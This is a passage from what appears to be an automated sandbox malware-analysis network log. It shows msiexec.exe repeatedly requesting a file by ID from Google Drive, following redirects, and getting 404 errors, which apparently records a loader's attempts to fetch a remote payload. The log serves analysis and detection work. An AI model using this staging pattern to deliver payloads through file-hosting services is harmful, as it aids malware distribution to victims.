                                                                  X-GUploader-UploadID: AFIdbgQWFXfNgV7BbCfRHp3XVJ5_flenCSiYHrTX3PW3kOavitprQqTCIo1381f2CBS-MCqv
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:37 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-VXRLM_55Opoep-Koys_K7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 36 62 70 48 59 37 56 6b 6a 49 44 71 48 33 64 76 38 41 74 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S6bpHY7VkjIDqH3dv8AtkQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.549917142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:38 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:38 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:38 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-zJtupZ_RGj53wYyyClk5tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.549923142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:39 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:39 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgRRl9Cl0eWslzj11xJwB4xxz77H6a2r10gcGeS8ln_rnWdFPmOD0xZPA5ql7WJ1lYiPmKUF6jc
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:39 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-5MacaLhm3Hk98SqFRZCc9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 65 65 52 6e 6d 7a 46 36 33 67 73 79 59 47 52 38 50 71 67 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8eeRnmzF63gsyYGR8PqgKw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.549934142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:40 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:41 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:40 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-UVpRTVovRWJ5w8Mo1NrBzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.549940142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:41 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:42 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC5IqaF5yWUKOIZz9Si-USSEJaga0FbEdgXihGhrm0cS-y7AoxP516MtptKN68O18FC-TUzw8SA
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:42 GMT
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-whAF82LKPgKWAii9A2IP6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 69 79 34 34 51 49 64 52 62 56 57 41 52 56 63 65 30 62 4d 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Riy44QIdRbVWARVce0bMNA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.549950142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:43 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:43 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:43 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-QaoQlk3YF-dzPmxBGSlM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.549962142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:44 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:44 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC7ydmdqa4NfFsEELO7d5nE94x_gF1O9Bu5yo3FRn3GbG1p48o5pfY8UFkjNP0WT8e7B4f0a80g
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:44 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce--xTroAfW7XKoMfVfURLugA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 67 52 4c 56 71 5a 51 67 47 30 46 4f 53 51 78 75 78 48 6f 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1gRLVqZQgG0FOSQxuxHo4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.549968142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:45 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:45 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:45 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-BJz2Ig3wXW5frcVvIrZjxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
